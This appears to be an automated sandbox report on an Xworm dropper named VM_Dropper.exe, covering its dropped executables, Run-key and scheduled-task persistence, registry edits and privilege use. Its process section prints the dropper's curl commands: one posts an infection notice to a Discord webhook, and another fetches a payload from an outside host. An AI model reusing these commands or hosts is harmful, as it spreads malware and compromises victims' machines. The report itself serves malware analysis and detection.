Analysis Overview
SHA256
de9ea4b92ab39c4ff711fb80136eb53553d8932620a1794e41354bb5fb4060bc
Threat Level: Known bad
The file VM_Dropper.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
Xworm
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-30 03:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 03:02
Reported
2024-05-30 03:07
Platform
win7-20240508-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
Network
Files
memory/1500-0-0x000000007440E000-0x000000007440F000-memory.dmp
memory/1500-1-0x0000000001070000-0x0000000001096000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-30 03:02
Reported
2024-05-30 03:08
Platform
win10v2004-20240226-en
Max time kernel
126s
Max time network
309s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 5328 created 3296 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\taskmgr.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3068 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 5232 created 3296 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\taskmgr.exe |
Xworm
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\yar.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\penisware.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\calc.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisware.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
| N/A | N/A | C:\Users\Admin\calc.exe | N/A |
| N/A | N/A | C:\Users\Admin\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisware.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
| N/A | N/A | C:\Users\Admin\calc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\penisware.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svvhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\penisware.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yar = "C:\\Users\\Admin\\AppData\\Roaming\\yar.exe" | C:\Users\Admin\yar.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penisware = "C:\\Users\\Admin\\AppData\\Local\\penisware.exe" | C:\Users\Admin\penisware.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svvhost = "C:\\Users\\Admin\\AppData\\Roaming\\svvhost.exe" | C:\Users\Admin\calc.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe | C:\Users\Admin\penisware.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | C:\Users\Admin\sachost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe | C:\Users\Admin\calc.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe | C:\Users\Admin\yar.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3068 set thread context of 3012 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\yar.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\calc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\penisware.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\penisware.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\penisware.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\yar.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\calc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\penisware.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\sachost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisballs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\physics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\sachost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\physics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisballs.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: 31 | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
